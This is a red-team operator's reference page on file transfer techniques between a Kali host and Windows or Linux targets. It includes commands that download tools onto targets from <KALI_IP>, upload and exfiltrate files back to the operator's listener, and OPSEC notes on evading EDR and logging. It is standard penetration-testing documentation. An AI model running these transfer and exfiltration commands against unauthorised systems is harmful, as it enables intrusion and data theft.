Skip to main content

File Transfer Techniques


Overview​

This section covers methods for moving files to and from Windows and Linux targets when dedicated protocols (WinRM, SMB, SCP) are unavailable or undesirable. All operator-side commands run from the Kali VM. Methods are organized by transport mechanism.


HTTP β€” Python Web Server​

Serve files from the Kali VM over HTTP. Target pulls the file using a native Windows or Linux tool.

Start Server (Kali)​

# Serve current directory on port 8080
python3 -m http.server 8080

# Serve a specific directory
python3 -m http.server 8080 --directory /opt/tools/

# Restrict to a specific interface (recommended on shared networks)
python3 -m http.server 8080 --bind <KALI_IP>

Pull File from Target β€” PowerShell​

# Invoke-WebRequest (PowerShell 3+)
Invoke-WebRequest -Uri "http://<KALI_IP>:8080/tool.exe" -OutFile "C:\Temp\tool.exe"

# Alias shorthand
iwr "http://<KALI_IP>:8080/tool.exe" -o "C:\Temp\tool.exe"

# WebClient (PowerShell 2 compat)
(New-Object System.Net.WebClient).DownloadFile("http://<KALI_IP>:8080/tool.exe", "C:\Temp\tool.exe")

Pull File from Target β€” cmd.exe (certutil)​

certutil is a built-in Windows binary usable for file download when PowerShell is restricted:

certutil -urlcache -split -f "http://<KALI_IP>:8080/tool.exe" C:\Temp\tool.exe

Clean up certutil cache after use:

certutil -urlcache -split -f "http://<KALI_IP>:8080/tool.exe" delete
certutil Detection

certutil downloads are highly signatured by EDR and AV products. Use only when other methods are unavailable, or on an endpoint without AV coverage.

Pull File from Target β€” Linux (curl/wget)​

curl -o /tmp/file http://<KALI_IP>:8080/file
wget -O /tmp/file http://<KALI_IP>:8080/file

HTTP β€” Upload (Target Pushes to Kali)​

updog provides a simple HTTP server with upload support and is pre-installed on Kali.

Start Upload Server (Kali)​

# Serve current directory with upload enabled on port 8443
updog -p 8443

# Specify directory
updog -d /opt/collection/ -p 8443

Files uploaded by the target appear in the directory updog is serving.

Upload from Target β€” PowerShell​

# Upload via HTTP POST
Invoke-WebRequest -Uri "http://<KALI_IP>:8443/upload" -Method POST -InFile "C:\Temp\output.txt"

# WebClient method
$wc = New-Object System.Net.WebClient
$wc.UploadFile("http://<KALI_IP>:8443/upload", "POST", "C:\Temp\output.txt")

Base64 Encode / Decode​

When no direct file transfer protocol is available (e.g., only shell access with no outbound HTTP), encode file content as base64, paste it through the shell, and decode on the other end. Works over any shell β€” SSH, WinRM, PSExec, etc.

Encode on Kali​

base64 -w 0 /path/to/file.exe > /tmp/file.b64
cat /tmp/file.b64 # Copy this output

Paste and Decode on Windows Target​

# Paste base64 string into a variable
$b64 = "<PASTE_BASE64_STRING_HERE>"

# Decode and write to file
[System.Convert]::FromBase64String($b64) | Set-Content -Encoding Byte "C:\Temp\file.exe"

Paste and Decode on Linux Target​

echo "<PASTE_BASE64_STRING>" | base64 -d > /tmp/file.exe

Encode on Windows (for exfil)​

# Encode a file to base64 β€” copy output, paste into Kali terminal, then decode
$bytes = [System.IO.File]::ReadAllBytes("C:\Temp\interesting_file.zip")
[System.Convert]::ToBase64String($bytes)

Netcat File Transfer​

nc is available on Kali. On Windows targets, nc.exe must be present β€” transfer it first via HTTP or SMB if needed.

Receive on Kali (Listener)​

nc -lvnp 4444 > received_file

Send from Linux Target​

nc <KALI_IP> 4444 < /path/to/file

Send from Windows Target β€” PowerShell (no nc.exe required)​

$client = New-Object System.Net.Sockets.TcpClient("<KALI_IP>", 4444)
$stream = $client.GetStream()
$bytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.exe")
$stream.Write($bytes, 0, $bytes.Length)
$stream.Flush()
$client.Close()

SMB β€” Temporary Share (Kali β†’ Windows)​

impacket-smbserver stands up a temporary SMB share from Kali. No configuration required on the target.

Start Share (Kali)​

# Serve current directory as share named "ops"
impacket-smbserver ops . -smb2support

# With credentials (prevents anonymous access)
impacket-smbserver ops /opt/tools/ -smb2support -username ops -password Passw0rd

Access Share from Windows Target​

# List share contents
dir \\<KALI_IP>\ops

# Copy file
copy \\<KALI_IP>\ops\tool.exe C:\Temp\

# If credentials required
net use \\<KALI_IP>\ops /user:ops Passw0rd
copy \\<KALI_IP>\ops\tool.exe C:\Temp\
net use \\<KALI_IP>\ops /delete
Copy-Item \\<KALI_IP>\ops\tool.exe -Destination C:\Temp\

Method Selection Guide​

ScenarioPreferred Method
Kali β†’ Windows target, HTTP reachablePython HTTP server + iwr
Kali β†’ Linux targetSCP, or Python HTTP + curl
Only shell access, small fileBase64 encode/paste/decode
Only shell access, large fileNetcat (PowerShell socket method on Windows)
Windows target needs multiple filesImpacket SMB server
Exfil from Windows target, shell onlyBase64 encode β†’ copy terminal output
RDP session openDrive mount via xfreerdp /drive:
Need target to push files backupdog upload server

OPSEC Notes​

  • Python HTTP server: Logs every request to stdout. Serves all files in the directory β€” don't run it from a directory containing sensitive operator files.
  • certutil: Highly detected. Avoid on endpoints with active EDR/AV.
  • Base64 paste: No network artifacts. The base64 string will appear in shell history on both ends and in PS script block logs (EID 4104) on Windows.
  • Impacket SMB server: Connection events are logged on the Windows target. The share name is visible in net view \\<KALI_IP> while active β€” shut it down immediately after transfer.
  • Netcat: Plain TCP, no encryption. Visible in netstat on both ends during transfer.